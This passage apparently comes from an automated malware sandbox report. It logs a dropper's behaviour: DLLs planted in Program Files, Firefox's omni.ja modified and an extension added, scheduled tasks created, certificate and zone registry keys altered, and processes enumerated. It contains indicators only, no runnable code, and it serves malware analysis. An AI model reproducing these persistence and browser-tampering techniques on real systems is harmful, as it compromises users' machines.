File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\ZkwLVLebrZrHT.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\XvHXZAA.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\GlGomVo.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\QOJPtoV.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\DEqklWO.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\kLLbZH.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\BaSMZgS.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\yigOzsN.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\eAjNchS.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BinjFlxHFUMMGNOij.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{0bf74aa2-0000-0000-0000-d01200000000} C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{0bf74aa2-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
